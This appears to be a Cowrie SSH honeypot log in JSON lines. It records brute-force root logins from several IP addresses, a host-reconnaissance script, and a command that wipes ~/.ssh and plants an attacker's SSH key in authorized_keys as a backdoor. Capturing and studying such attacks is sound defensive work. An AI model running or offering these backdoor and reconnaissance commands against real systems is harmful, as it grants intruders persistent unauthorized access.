{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:52:47.497870Z","src_ip":"212.227.235.229","session":"a3c6972691df"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:52:48.813459Z","src_ip":"212.227.235.229","session":"a3c6972691df"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:50.145272Z","src_ip":"212.227.235.229","session":"a3c6972691df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34506,"dst_ip":"1.2.3.4","dst_port":22,"session":"75c4c7793dab","protocol":"ssh","message":"New connection: 212.227.235.229:34506 (1.2.3.4:22) [session: 75c4c7793dab]","sensor":"my-vps","timestamp":"2025-09-08T12:52:50.404438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:52:50.405390Z","src_ip":"212.227.235.229","session":"75c4c7793dab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:52:50.666007Z","src_ip":"212.227.235.229","session":"75c4c7793dab"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:52:51.767851Z","src_ip":"212.227.235.229","session":"75c4c7793dab"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:52.029528Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:52.030619Z","src_ip":"212.227.235.229","session":"75c4c7793dab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38298,"dst_ip":"1.2.3.4","dst_port":22,"session":"39d644b7ea2d","protocol":"ssh","message":"New connection: 212.227.235.229:38298 (1.2.3.4:22) [session: 39d644b7ea2d]","sensor":"my-vps","timestamp":"2025-09-08T12:52:54.670972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:52:54.671901Z","src_ip":"212.227.235.229","session":"39d644b7ea2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:52:54.797407Z","src_ip":"212.227.235.229","session":"39d644b7ea2d"}
{"eventid":"cowrie.login.failed","username":"client","password":"password123","message":"login attempt [client/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:52:55.342567Z","src_ip":"212.227.235.229","session":"39d644b7ea2d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:56.470487Z","src_ip":"212.227.235.229","session":"39d644b7ea2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38788,"dst_ip":"1.2.3.4","dst_port":22,"session":"319551ac4d7e","protocol":"ssh","message":"New connection: 212.227.235.229:38788 (1.2.3.4:22) [session: 319551ac4d7e]","sensor":"my-vps","timestamp":"2025-09-08T12:53:01.070817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:53:01.071890Z","src_ip":"212.227.235.229","session":"319551ac4d7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:53:01.243887Z","src_ip":"212.227.235.229","session":"319551ac4d7e"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1.123","message":"login attempt [test1/test1.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:53:01.974469Z","src_ip":"212.227.235.229","session":"319551ac4d7e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:03.148499Z","src_ip":"212.227.235.229","session":"319551ac4d7e"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39096,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef5051bf17d0","protocol":"ssh","message":"New connection: 134.199.174.250:39096 (1.2.3.4:22) [session: ef5051bf17d0]","sensor":"my-vps","timestamp":"2025-09-08T12:53:03.847958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:53:03.848865Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":39120,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb0c08401ac0","protocol":"ssh","message":"New connection: 139.59.14.27:39120 (1.2.3.4:22) [session: fb0c08401ac0]","sensor":"my-vps","timestamp":"2025-09-08T12:53:04.100206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:53:04.100976Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:53:04.233861Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:53:04.455106Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.login.success","username":"root","password":"pass123","message":"login attempt [root/pass123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.007632Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:53:05.579945Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.580701Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.581309Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.582473Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.584373Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.585172Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.585870Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.586999Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.587576Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.588299Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.588629Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.589185Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.589752Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.847279Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.848164Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.849105Z","src_ip":"134.199.174.250","session":"ef5051bf17d0"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty23","message":"login attempt [root/qwerty23] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:53:05.944145Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:53:06.702550Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:53:06.703270Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:53:06.704084Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:07.048832Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:53:07.786516Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:53:07.787211Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:53:08.136275Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:08.137231Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
